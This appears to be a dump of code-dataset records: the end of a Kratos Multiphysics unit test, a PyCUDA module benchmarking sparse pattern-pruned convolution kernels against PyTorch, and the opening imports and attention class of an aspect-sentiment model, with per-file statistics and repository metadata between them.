"CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "line_output_1.dat", "comparison_type" : "dat_file" } } ,{ "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "line_output_2.dat", "comparison_type" : "dat_file" } }, { "python_module" : "compare_two_files_check_process", "kratos_module" : "KratosMultiphysics", "process_name" : "CompareTwoFilesCheckProcess", "Parameters" : { "reference_file_name" : "", "output_file_name" : "line_output_3.dat", "comparison_type" : "dat_file" } }] }""") settings["process_list"][1]["Parameters"]["reference_file_name"].SetString(reference_file_name_1) settings["process_list"][2]["Parameters"]["reference_file_name"].SetString(reference_file_name_2) settings["process_list"][3]["Parameters"]["reference_file_name"].SetString(reference_file_name_3) model_part.ProcessInfo[DOMAIN_SIZE] = 3 end_time = 5.0 delta_time = 0.15 model_part.ProcessInfo[TIME] = 0.0 SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time) def test_assign_flag_process(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part_io = ModelPartIO(GetFilePath("test_processes")) model_part_io.ReadModelPart(model_part) settings = Parameters("""{ "process_list" : [ { "python_module" : "assign_flag_process", "kratos_module" : "KratosMultiphysics", "process_name" : "AssignFlagProcess", "Parameters" : { "mesh_id" : 0, "model_part_name" : "Main", "flag_name" : "ACTIVE", "value" : true, "entities" : ["nodes","elements"] } }] }""") import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) model_part.CloneTimeStep(1.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result for node in model_part.Nodes: 
self.assertEqual(node.Is(ACTIVE), True) for cond in model_part.Conditions: self.assertEqual(cond.Is(ACTIVE), False) for elem in model_part.Elements: self.assertEqual(elem.Is(ACTIVE), True) def test_fix_processes(self): current_model = Model() model_part = current_model.CreateModelPart("Main") model_part.AddNodalSolutionStepVariable(DISPLACEMENT) model_part.AddNodalSolutionStepVariable(VELOCITY) model_part.AddNodalSolutionStepVariable(VISCOSITY) model_part.AddNodalSolutionStepVariable(DENSITY) model_part_io = ModelPartIO(GetFilePath("test_model_part_io_read")) model_part_io.ReadModelPart(model_part) #reset all data for node in model_part.Nodes: node.Free(DISPLACEMENT_X) node.Free(DISPLACEMENT_Y) node.Free(DISPLACEMENT_Z) node.Free(VELOCITY_X) node.Free(VELOCITY_Y) node.Free(VELOCITY_Z) node.SetSolutionStepValue(DENSITY,0,0.0) node.SetSolutionStepValue(VISCOSITY,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_X,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_Y,0,0.0) node.SetSolutionStepValue(DISPLACEMENT_Z,0,0.0) node.SetSolutionStepValue(VELOCITY_X,0,0.0) node.SetSolutionStepValue(VELOCITY_Y,0,0.0) node.SetSolutionStepValue(VELOCITY_Z,0,0.0) settings = Parameters( """ { "process_list" : [ { "python_module" : "fix_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "FixScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VISCOSITY", "interval" : [1.0, 2.0], "constrained" : true } }, { "python_module" : "fix_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "FixScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DENSITY", "interval" : [3.0, 1e30] } }, { "python_module" : "fix_scalar_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "FixScalarVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT_X", "constrained" : true } }, { "python_module" : 
"fix_vector_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "FixVectorVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "DISPLACEMENT" } }, { "python_module" : "fix_vector_variable_process", "kratos_module" : "KratosMultiphysics", "process_name" : "FixVectorVariableProcess", "Parameters" : { "model_part_name" : "Main", "variable_name" : "VELOCITY", "constrained" : [false, true, true] } } ] } """ ) import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) for node in model_part.Nodes: self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) ############################################################ ##time = 1 - all active except DENSITY model_part.CloneTimeStep(1.0) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) self.assertEqual(node.GetSolutionStepValue(VELOCITY_X), 0.0) self.assertEqual(node.GetSolutionStepValue(DENSITY), 0.0) self.assertEqual(node.GetSolutionStepValue(VISCOSITY), 0.0) self.assertFalse(node.IsFixed(DENSITY)) self.assertTrue(node.IsFixed(VISCOSITY)) self.assertTrue(node.IsFixed(DISPLACEMENT_X)) self.assertTrue(node.IsFixed(DISPLACEMENT_Y)) self.assertTrue(node.IsFixed(DISPLACEMENT_Z)) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertTrue(node.IsFixed(VELOCITY_Y)) self.assertTrue(node.IsFixed(VELOCITY_Z)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ##verify the result for node in model_part.Nodes: self.assertFalse(node.IsFixed(DENSITY)) self.assertFalse(node.IsFixed(VISCOSITY)) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) 
self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertFalse(node.IsFixed(VELOCITY_Y)) self.assertFalse(node.IsFixed(VELOCITY_Z)) ############################################################ ##time = 3 - all active except VISCOSITY model_part.CloneTimeStep(3.0) for node in model_part.Nodes: self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertFalse(node.IsFixed(VELOCITY_Y)) self.assertFalse(node.IsFixed(VELOCITY_Z)) for process in list_of_processes: process.ExecuteInitializeSolutionStep() ##verify the result for node in model_part.Nodes: self.assertEqual(node.GetSolutionStepValue(DISPLACEMENT_X), 0.0) self.assertEqual(node.GetSolutionStepValue(VELOCITY_X), 0.0) self.assertEqual(node.GetSolutionStepValue(DENSITY), 0.0) self.assertEqual(node.GetSolutionStepValue(VISCOSITY), 0.0) self.assertTrue(node.IsFixed(DENSITY)) self.assertFalse(node.IsFixed(VISCOSITY)) self.assertTrue(node.IsFixed(DISPLACEMENT_X)) self.assertTrue(node.IsFixed(DISPLACEMENT_Y)) self.assertTrue(node.IsFixed(DISPLACEMENT_Z)) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertTrue(node.IsFixed(VELOCITY_Y)) self.assertTrue(node.IsFixed(VELOCITY_Z)) for process in list_of_processes: process.ExecuteFinalizeSolutionStep() ##verify the result for node in model_part.Nodes: self.assertFalse(node.IsFixed(DENSITY)) self.assertFalse(node.IsFixed(VISCOSITY)) self.assertFalse(node.IsFixed(DISPLACEMENT_X)) self.assertFalse(node.IsFixed(DISPLACEMENT_Y)) self.assertFalse(node.IsFixed(DISPLACEMENT_Z)) self.assertFalse(node.IsFixed(VELOCITY_X)) self.assertFalse(node.IsFixed(VELOCITY_Y)) self.assertFalse(node.IsFixed(VELOCITY_Z)) def SetNodalValuesForPointOutputProcesses(model_part): time = model_part.ProcessInfo[TIME] vec = Vector(3) for node in model_part.Nodes: vec[0] = round(math.sqrt(node.X**2+node.Y**2)*time ,6) vec[1] = round(node.X**2+node.Y**2 + time ,6) vec[2] = round(node.X+node.Y + time ,6) node.SetSolutionStepValue(DISPLACEMENT, vec) node.SetSolutionStepValue(ACCELERATION, vec*time) 
node.SetSolutionStepValue(VISCOSITY, time**2 + 1.038) def SolutionLoopPointOutputProcesses(model_part, settings, end_time, delta_time): current_model = model_part.GetModel() import process_factory list_of_processes = process_factory.KratosProcessFactory(current_model).ConstructListOfProcesses( settings["process_list"] ) for process in list_of_processes: process.ExecuteInitialize() for process in list_of_processes: process.ExecuteBeforeSolutionLoop() while model_part.ProcessInfo[TIME] < end_time: model_part.ProcessInfo[TIME] += delta_time SetNodalValuesForPointOutputProcesses(model_part) for process in list_of_processes: process.ExecuteInitializeSolutionStep() for process in list_of_processes: process.ExecuteBeforeOutputStep() for process in list_of_processes: process.ExecuteAfterOutputStep() for process in list_of_processes: process.ExecuteFinalizeSolutionStep() for process in list_of_processes: process.ExecuteFinalize() if __name__ == '__main__': KratosUnittest.main()
47.069106
147
0.522627
5,837
69,474
5.953572
0.053623
0.063451
0.04374
0.041898
0.91606
0.896118
0.877442
0.858536
0.850508
0.835026
0
0.015193
0.380387
69,474
1,475
148
47.101017
0.792064
0.039108
0
0.783051
0
0
0.308368
0.06225
0
0
0
0
0.19887
0
null
null
0
0.019209
null
null
0.00113
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
8
81d47d43c69df7d316d6873c44a20f70f0c60d38
22,639
py
Python
sparse_conv.py
BoFeng2477/E4750-Project-APPN
5ddb8a693a7f4cc2503e978f7fcf971dfc189609
[ "MIT" ]
null
null
null
sparse_conv.py
BoFeng2477/E4750-Project-APPN
5ddb8a693a7f4cc2503e978f7fcf971dfc189609
[ "MIT" ]
null
null
null
sparse_conv.py
BoFeng2477/E4750-Project-APPN
5ddb8a693a7f4cc2503e978f7fcf971dfc189609
[ "MIT" ]
null
null
null
import numpy as np import time from scipy import signal import pycuda.autoinit import pycuda.driver as cuda from pycuda.compiler import SourceModule from SparsityAnalysis import extract_patterns, SparseConvArrays import torch.nn as nn import torch from conv_naive import Convolution from tqdm import tqdm class SparseConvolution: def __init__(self): """ Attributes for instance of EncoderDecoder module """ self.mod = self.getSourceModule() pass def getSourceModule(self): # kernel code wrapper kernelwrapper = """ #define BLOCK_WIDTH 4 #define CONSTANT_SIZE 16384 __constant__ float Weight[CONSTANT_SIZE]; __global__ void sparse_conv_naive(float *data, int *offset, int *reorder, int *index, int *stride, float *weight, float *ptset, float *out, int bn, int IC, int IH, int IW, int OC, int OH, int OW, int ptset_size, int non_zero, int mask_width, int step) { int filter_idx = blockIdx.x * blockDim.x + threadIdx.x; int row = blockIdx.y * blockDim.y + threadIdx.y; int col = blockIdx.z * blockDim.z + threadIdx.z; int output_index = bn * OC * OH * OW + reorder[filter_idx] * OH * OW + row * OW + col; //int tx = threadIdx.x; //int ty = threadIdx.y; //int tz = threadIdx.z; if(filter_idx < OC){ int topleft_col = col * step - ((mask_width - 1) / 2); int topleft_row = row * step - ((mask_width - 1) / 2); int oc_stride_start = filter_idx * (ptset_size + 1); float output = 0; for(int pi = 0; pi < ptset_size; pi++){ int stride_index = oc_stride_start + pi; int nkernels = stride[stride_index + 1] - stride[stride_index]; int kernel_index_start = offset[filter_idx] + stride[stride_index]; for(int k = 0; k < nkernels; k++){ int topleft_data_index = bn * IC * IH * IW + index[kernel_index_start + k] * IH * IW + topleft_row * IW + topleft_col; for(int v = 0; v < non_zero; v++){ int cur_row = topleft_row + ptset[pi * non_zero * 2 + v * 2 + 0]; int cur_col = topleft_col + ptset[pi * non_zero * 2 + v * 2 + 1]; int cur_index = topleft_data_index + ptset[pi * non_zero * 2 + v * 2 + 0] * IW + ptset[pi 
* non_zero * 2 + v * 2 + 1]; //out[output_index] = ptset[pi * non_zero * 2 + v * 2 + 0]; if(cur_row >= 0 && cur_row < IH && cur_col >=0 && cur_col < IW){ output += data[cur_index] * weight[non_zero * (kernel_index_start + k) + v]; } } } } out[output_index] = output; } } __global__ void sparse_conv_shared(float *data, int *offset, int *reorder, int *index, int *stride, float *weight, float *ptset, float *out, int bn, int IC, int IH, int IW, int OC, int OH, int OW, int ptset_size, int non_zero, int mask_width, int step) { int filter_idx = blockIdx.x * blockDim.x + threadIdx.x; int row = blockIdx.y * blockDim.y + threadIdx.y; int col = blockIdx.z * blockDim.z + threadIdx.z; int output_index = bn * OC * OH * OW + reorder[filter_idx] * OH * OW + row * OW + col; int tx = threadIdx.x; int ty = threadIdx.y; int tz = threadIdx.z; __shared__ float output[BLOCK_WIDTH][BLOCK_WIDTH][BLOCK_WIDTH]; output[tz][ty][tx] = 0; if(filter_idx < OC){ int topleft_col = col * step - ((mask_width - 1) / 2); int topleft_row = row * step - ((mask_width - 1) / 2); int oc_stride_start = filter_idx * (ptset_size + 1); for(int pi = 0; pi < ptset_size; pi++){ int stride_index = oc_stride_start + pi; int nkernels = stride[stride_index + 1] - stride[stride_index]; int kernel_index_start = offset[filter_idx] + stride[stride_index]; for(int k = 0; k < nkernels; k++){ int topleft_data_index = bn * IC * IH * IW + index[kernel_index_start + k] * IH * IW + topleft_row * IW + topleft_col; for(int v = 0; v < non_zero; v++){ int cur_row = topleft_row + ptset[pi * non_zero * 2 + v * 2 + 0]; int cur_col = topleft_col + ptset[pi * non_zero * 2 + v * 2 + 1]; int cur_index = topleft_data_index + ptset[pi * non_zero * 2 + v * 2 + 0] * IW + ptset[pi * non_zero * 2 + v * 2 + 1]; //out[output_index] = ptset[pi * non_zero * 2 + v * 2 + 0]; if(cur_row >= 0 && cur_row < IH && cur_col >=0 && cur_col < IW){ output[tz][ty][tx] += data[cur_index] * weight[non_zero * (kernel_index_start + k) + v]; } } } } out[output_index] = 
output[tz][ty][tx]; } } __global__ void sparse_conv_shared_constant(float *data, int *offset, int *reorder, int *index, int *stride, float *ptset, float *out, int bn, int IC, int IH, int IW, int OC, int OH, int OW, int ptset_size, int non_zero, int mask_width, int step) { int filter_idx = blockIdx.x * blockDim.x + threadIdx.x; int row = blockIdx.y * blockDim.y + threadIdx.y; int col = blockIdx.z * blockDim.z + threadIdx.z; int output_index = bn * OC * OH * OW + reorder[filter_idx] * OH * OW + row * OW + col; int tx = threadIdx.x; int ty = threadIdx.y; int tz = threadIdx.z; __shared__ float output[BLOCK_WIDTH][BLOCK_WIDTH][BLOCK_WIDTH]; output[tz][ty][tx] = 0; if(filter_idx < OC){ int topleft_col = col * step - ((mask_width - 1) / 2); int topleft_row = row * step - ((mask_width - 1) / 2); int oc_stride_start = filter_idx * (ptset_size + 1); for(int pi = 0; pi < ptset_size; pi++){ int stride_index = oc_stride_start + pi; int nkernels = stride[stride_index + 1] - stride[stride_index]; int kernel_index_start = offset[filter_idx] + stride[stride_index]; for(int k = 0; k < nkernels; k++){ int topleft_data_index = bn * IC * IH * IW + index[kernel_index_start + k] * IH * IW + topleft_row * IW + topleft_col; for(int v = 0; v < non_zero; v++){ int cur_row = topleft_row + ptset[pi * non_zero * 2 + v * 2 + 0]; int cur_col = topleft_col + ptset[pi * non_zero * 2 + v * 2 + 1]; int cur_index = topleft_data_index + ptset[pi * non_zero * 2 + v * 2 + 0] * IW + ptset[pi * non_zero * 2 + v * 2 + 1]; //out[output_index] = ptset[pi * non_zero * 2 + v * 2 + 0]; if(cur_row >= 0 && cur_row < IH && cur_col >=0 && cur_col < IW){ output[tz][ty][tx] += data[cur_index] * Weight[non_zero * (kernel_index_start + k) + v]; } } } } out[output_index] = output[tz][ty][tx]; } } """ # you can either use a string or save the kernel in kernel.cu file and reference it here. # Compile the kernel code when an instance # of this class is made. 
return SourceModule(kernelwrapper) def conv_sparse_naive(self, data, offset, reorder, index, stride, weight, ptset, step, out): BN, IC, IH, IW = data.shape _, OC, OH, OW = out.shape mask_width = 3 pattern_set_size = ptset.shape[0] nonzero_per_kernel = ptset.shape[1] block_width = 4 block_dim = (block_width, block_width, block_width) grid_dim = ((OC - 1) // block_width + 1, (OH - 1) // block_width + 1, (OW - 1) // block_width + 1) time_computation_start = cuda.Event() time_computation_end = cuda.Event() time_mem_transfer_start = cuda.Event() time_mem_transfer_end = cuda.Event() time_mem_transfer_start.record() data_d = cuda.mem_alloc(data.nbytes) offset_d = cuda.mem_alloc(offset.nbytes) reorder_d = cuda.mem_alloc(reorder.nbytes) index_d = cuda.mem_alloc(index.nbytes) stride_d = cuda.mem_alloc(stride.nbytes) weight_d = cuda.mem_alloc(weight.nbytes) ptset_d = cuda.mem_alloc(ptset.nbytes) out_d = cuda.mem_alloc(out.nbytes) do_conv_sparse = self.mod.get_function("sparse_conv_naive") cuda.memcpy_htod(data_d, data) cuda.memcpy_htod(offset_d, offset) cuda.memcpy_htod(reorder_d, reorder) cuda.memcpy_htod(index_d, index) cuda.memcpy_htod(stride_d, stride) cuda.memcpy_htod(weight_d, weight) cuda.memcpy_htod(ptset_d, ptset) time_computation_start.record() for bn in range(BN): do_conv_sparse(data_d, offset_d, reorder_d, index_d, stride_d, weight_d, ptset_d, out_d, np.int32(bn), np.int32(IC), np.int32(IH), np.int32(IW), np.int32(OC), np.int32(OH), np.int32(OW), np.int32(pattern_set_size), np.int32(nonzero_per_kernel), np.int32(mask_width), np.int32(step), block=block_dim, grid=grid_dim) time_computation_end.record() time_computation_end.synchronize() # time_computation_end = time.time() cuda.memcpy_dtoh(out, out_d) time_mem_transfer_end.record() time_mem_transfer_end.synchronize() # time_mem_transfer_end = time.time() time_without_mem = time_computation_start.time_till(time_computation_end)*1e-3 time_include_mem = time_mem_transfer_start.time_till(time_mem_transfer_end)*1e-3 # 
time_without_mem = time_computation_end - time_computation_start # time_include_mem = time_mem_transfer_end - time_mem_transfer_start return out, time_without_mem, time_include_mem def conv_sparse_shared_mem(self, data, offset, reorder, index, stride, weight, ptset, step, out): BN, IC, IH, IW = data.shape _, OC, OH, OW = out.shape mask_width = 3 pattern_set_size = ptset.shape[0] nonzero_per_kernel = ptset.shape[1] block_width = 4 block_dim = (block_width, block_width, block_width) grid_dim = ((OC - 1) // block_width + 1, (OH - 1) // block_width + 1, (OW - 1) // block_width + 1) time_computation_start = cuda.Event() time_computation_end = cuda.Event() time_mem_transfer_start = cuda.Event() time_mem_transfer_end = cuda.Event() time_mem_transfer_start.record() data_d = cuda.mem_alloc(data.nbytes) offset_d = cuda.mem_alloc(offset.nbytes) reorder_d = cuda.mem_alloc(reorder.nbytes) index_d = cuda.mem_alloc(index.nbytes) stride_d = cuda.mem_alloc(stride.nbytes) weight_d = cuda.mem_alloc(weight.nbytes) ptset_d = cuda.mem_alloc(ptset.nbytes) out_d = cuda.mem_alloc(out.nbytes) do_conv_sparse_shared = self.mod.get_function("sparse_conv_shared") cuda.memcpy_htod(data_d, data) cuda.memcpy_htod(offset_d, offset) cuda.memcpy_htod(reorder_d, reorder) cuda.memcpy_htod(index_d, index) cuda.memcpy_htod(stride_d, stride) cuda.memcpy_htod(weight_d, weight) cuda.memcpy_htod(ptset_d, ptset) time_computation_start.record() for bn in range(BN): do_conv_sparse_shared(data_d, offset_d, reorder_d, index_d, stride_d, weight_d, ptset_d, out_d, np.int32(bn), np.int32(IC), np.int32(IH), np.int32(IW), np.int32(OC), np.int32(OH), np.int32(OW), np.int32(pattern_set_size), np.int32(nonzero_per_kernel), np.int32(mask_width), np.int32(step), block=block_dim, grid=grid_dim) time_computation_end.record() time_computation_end.synchronize() # time_computation_end = time.time() cuda.memcpy_dtoh(out, out_d) time_mem_transfer_end.record() time_mem_transfer_end.synchronize() # time_mem_transfer_end = 
time.time() time_without_mem = time_computation_start.time_till(time_computation_end)*1e-3 time_include_mem = time_mem_transfer_start.time_till(time_mem_transfer_end)*1e-3 # time_without_mem = time_computation_end - time_computation_start # time_include_mem = time_mem_transfer_end - time_mem_transfer_start return out, time_without_mem, time_include_mem def conv_sparse_shared_constant_mem(self, data, offset, reorder, index, stride, weight, ptset, step, out): BN, IC, IH, IW = data.shape _, OC, OH, OW = out.shape mask_width = 3 pattern_set_size = ptset.shape[0] nonzero_per_kernel = ptset.shape[1] block_width = 4 block_dim = (block_width, block_width, block_width) grid_dim = ((OC - 1) // block_width + 1, (OH - 1) // block_width + 1, (OW - 1) // block_width + 1) time_computation_start = cuda.Event() time_computation_end = cuda.Event() time_mem_transfer_start = cuda.Event() time_mem_transfer_end = cuda.Event() time_mem_transfer_start.record() data_d = cuda.mem_alloc(data.nbytes) offset_d = cuda.mem_alloc(offset.nbytes) reorder_d = cuda.mem_alloc(reorder.nbytes) index_d = cuda.mem_alloc(index.nbytes) stride_d = cuda.mem_alloc(stride.nbytes) weight_d, _ = self.mod.get_global('Weight') ptset_d = cuda.mem_alloc(ptset.nbytes) out_d = cuda.mem_alloc(out.nbytes) do_conv_sparse_shared_constant = self.mod.get_function("sparse_conv_shared_constant") cuda.memcpy_htod(data_d, data) cuda.memcpy_htod(offset_d, offset) cuda.memcpy_htod(reorder_d, reorder) cuda.memcpy_htod(index_d, index) cuda.memcpy_htod(stride_d, stride) cuda.memcpy_htod(weight_d, weight) cuda.memcpy_htod(ptset_d, ptset) time_computation_start.record() for bn in range(BN): do_conv_sparse_shared_constant(data_d, offset_d, reorder_d, index_d, stride_d, ptset_d, out_d, np.int32(bn), np.int32(IC), np.int32(IH), np.int32(IW), np.int32(OC), np.int32(OH), np.int32(OW), np.int32(pattern_set_size), np.int32(nonzero_per_kernel), np.int32(mask_width), np.int32(step), block=block_dim, grid=grid_dim) time_computation_end.record() 
time_computation_end.synchronize() cuda.memcpy_dtoh(out, out_d) time_mem_transfer_end.record() time_mem_transfer_end.synchronize() time_without_mem = time_computation_start.time_till(time_computation_end)*1e-3 time_include_mem = time_mem_transfer_start.time_till(time_mem_transfer_end)*1e-3 return out, time_without_mem, time_include_mem def conv_nnpack(): conv = Convolution() cuda0 = torch.device('cuda:0') cpu = torch.device('cpu') total_time = 0 for idx in tqdm(range(len(residual_convs[:]))): input_data = np.ones(data_shapes[idx]).astype(np.float32) conv_mask = residual_convs[idx].astype(np.float32) input_data_g = torch.tensor(input_data, device=cuda0) conv_mask_g = torch.tensor(conv_mask, device=cuda0) start = time.time() output_gt = nn.functional.conv2d(input_data_g, conv_mask_g, padding=1) # output_gt = nn.functional.conv2d(torch.tensor(input_data), torch.tensor(conv_mask),padding=1) end = time.time() total_time += end - start print("nnpack") print(f'{round(total_time, 3)}s') def conv_naive(): conv = Convolution() cuda0 = torch.device('cuda:0') total_time = 0 for idx in tqdm(range(len(residual_convs[:]))): input_data = np.ones(data_shapes[idx]).astype(np.float32) conv_mask = residual_convs[idx].astype(np.float32) output_1, time_ = conv.conv_multiple_filters(input_data, conv_mask) total_time += time_ #print(f'{round(total_time,3)}s') print("naive") print(f'{round(total_time,3)}s') # if __name__ == "__main__": # conv = SparseConvolution() # # path = 'resnet34_6_pattern_connectivity_pruning.pt' # state_dict = torch.load(path, map_location=torch.device('cpu')) # # residual_convs = [v.cpu().numpy() for (k, v) in state_dict.items() if "layer" in k and "conv" in k] # data_shapes = [ # [1, 64, 32, 32], [1, 64, 32, 32], [1, 64, 32, 32], [1, 64, 32, 32], [1, 64, 32, 32], [1, 64, 32, 32], # [1, 64, 32, 32], [1, 128, 16, 16], [1, 128, 16, 16], [1, 128, 16, 16], [1, 128, 16, 16], [1, 128, 16, 16], # [1, 128, 16, 16], [1, 128, 16, 16], [1, 128, 16, 16], [1, 256, 8, 8], [1, 
256, 8, 8], [1, 256, 8, 8], # [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], # [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], [1, 512, 4, 4], [1, 512, 4, 4], [1, 512, 4, 4], # [1, 512, 4, 4], [1, 512, 4, 4], # ] # # time_without_mem_list_naive = [] # time_include_mem_list_naive = [] # time_without_mem_list_shared = [] # time_include_mem_list_shared = [] # time_without_mem_list_constant = [] # time_include_mem_list_constant = [] # time_list_pytorch = [] # # for i in range(len(residual_convs)): # print("layer" + str(i)) # input_data = np.float32(np.ones(data_shapes[i])) # # output_data = np.float32(np.zeros(data_shapes[i + 1])) # # conv_layer_weight = residual_convs[i].astype(np.float32) # patterns = np.array(extract_patterns(conv_layer_weight)) # sparse_conv_arrays = SparseConvArrays(conv_layer_weight, patterns) # offset = sparse_conv_arrays.offset # reorder = sparse_conv_arrays.reorder # index = sparse_conv_arrays.index # stride = sparse_conv_arrays.stride # sparse_weight = sparse_conv_arrays.weight # ptset = np.float32(sparse_conv_arrays.ptset) # # # step 卷积步长 # step = int(data_shapes[i][2] / data_shapes[i + 1][2]) # output_naive, time_without_mem_naive, time_include_mem_naive = conv.conv_sparse_naive(input_data, offset, reorder, index, stride, sparse_weight, ptset, step, output_data) # output_shared, time_without_mem_shared, time_include_mem_shared = conv.conv_sparse_shared_mem(input_data, offset, reorder, index, stride, sparse_weight, ptset, step, output_data) # # time_without_mem_list_naive.append(time_without_mem_naive) # time_include_mem_list_naive.append(time_include_mem_naive) # time_without_mem_list_shared.append(time_without_mem_shared) # time_include_mem_list_shared.append(time_include_mem_shared) # # #constant memory limit # if sparse_weight.shape[0] <= 16384: # output_constant, time_without_mem_constant, time_include_mem_constant = conv.conv_sparse_shared_constant_mem(input_data, offset, reorder, index, 
stride, sparse_weight, ptset, step, output_data) # time_without_mem_list_constant.append(time_without_mem_constant) # time_include_mem_list_constant.append(time_include_mem_constant) # # pytorch_start = time.time() # output_gt = nn.functional.conv2d(torch.tensor(input_data), torch.tensor(conv_layer_weight), padding=1, stride=step) # pytorch_end = time.time() # # pytorch_time = pytorch_end - pytorch_start # time_list_pytorch.append(pytorch_time) # # output_gt = output_gt.cpu().numpy() # # print(np.allclose(output_naive, output_gt)) # # print(np.allclose(output_shared, output_gt)) # # #constant memory limit # # if sparse_weight.shape[0] <= 16384: # # print(np.allclose(output_constant, output_gt)) # # #break when it comes to last layer # if i == len(residual_convs) - 2: # break # # print("Pytorch Conv2d time") # print(np.sum(time_list_pytorch)) # print("Sparse Naive without memory transfer") # print(np.sum(time_without_mem_list_naive)) # print("parse Naive include memory transfer") # print(np.sum(time_include_mem_list_naive)) # print("Sparse Shared memory without memory transfer") # print(np.sum(time_without_mem_list_shared)) # print("Sparse Shared memory include memory transfer") # print(np.sum(time_include_mem_list_shared)) # print("Sparse Shared and Constant memory without memory transfer") # print(time_without_mem_list_constant) # print("Sparse Shared and Constant memory include memory transfer") # print(time_include_mem_list_constant) # # conv_naive() # conv_nnpack()
43.121905
209
0.566809
2,915
22,639
4.110806
0.074443
0.019277
0.033798
0.024952
0.812401
0.785446
0.760828
0.726446
0.722106
0.714763
0
0.030454
0.325544
22,639
524
210
43.204198
0.754339
0.224568
0
0.731959
0
0.058419
0.460336
0.026107
0
0
0
0
0
1
0.024055
false
0.003436
0.037801
0
0.079038
0.013746
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
81e16c14f8ddfae1860d7da80bbef6084be49d06
104,578
py
Python
nlp_tasks/absa/aspect_category_detection_and_sentiment_classification/pytorch_models.py
l294265421/AC-MIMLLN
f62e71a1d7f3f6a6d2c3ec469570a171db4300a4
[ "MIT" ]
21
2020-12-12T01:54:56.000Z
2021-12-14T12:26:51.000Z
nlp_tasks/absa/aspect_category_detection_and_sentiment_classification/pytorch_models.py
l294265421/AC-MIMLLN
f62e71a1d7f3f6a6d2c3ec469570a171db4300a4
[ "MIT" ]
1
2021-09-27T03:07:22.000Z
2021-09-28T08:22:59.000Z
nlp_tasks/absa/aspect_category_detection_and_sentiment_classification/pytorch_models.py
l294265421/AC-MIMLLN
f62e71a1d7f3f6a6d2c3ec469570a171db4300a4
[ "MIT" ]
4
2020-12-30T13:40:37.000Z
2021-12-05T09:30:50.000Z
# -*- coding: utf-8 -*- from typing import * from overrides import overrides import time import copy import os import re import numpy as np import torch import torch.nn as nn import torch.optim as optim from allennlp.modules.seq2vec_encoders import CnnEncoder as VectorCnnEncoder from allennlp.nn.util import get_text_field_mask from allennlp.models import Model from allennlp.modules.text_field_embedders import TextFieldEmbedder from allennlp.data.fields import TextField, MetadataField, ArrayField, LabelField from allennlp.data.token_indexers import SingleIdTokenIndexer from allennlp.data.token_indexers import TokenIndexer from allennlp.data import Instance from allennlp.data.token_indexers import TokenIndexer from allennlp.data.tokenizers import Token from allennlp.nn import util as nn_util from allennlp.data.vocabulary import Vocabulary from allennlp.data.dataset_readers import DatasetReader import torch.nn.functional as F from allennlp.training import metrics from allennlp.models import BasicClassifier from allennlp.modules import attention from allennlp.data.iterators import DataIterator from tqdm import tqdm from scipy.special import expit from allennlp.nn import util as allennlp_util import dgl from dgl import function as dgl_fn from sklearn.metrics import f1_score, precision_score, recall_score from nlp_tasks.utils import attention_visualizer from nlp_tasks.absa.aspect_category_detection_and_sentiment_classification import allennlp_metrics from nlp_tasks.absa.aspect_category_detection_and_sentiment_classification.cnn_encoder_seq2seq import CnnEncoder class AttentionInHtt(nn.Module): """ 2016-Hierarchical Attention Networks for Document Classification """ def __init__(self, in_features, out_features, bias=True, softmax=True): super().__init__() self.W = nn.Linear(in_features, out_features, bias) self.uw = nn.Linear(out_features, 1, bias=False) self.softmax = softmax def forward(self, h: torch.Tensor, mask: torch.Tensor): u = self.W(h) u = torch.tanh(u) 
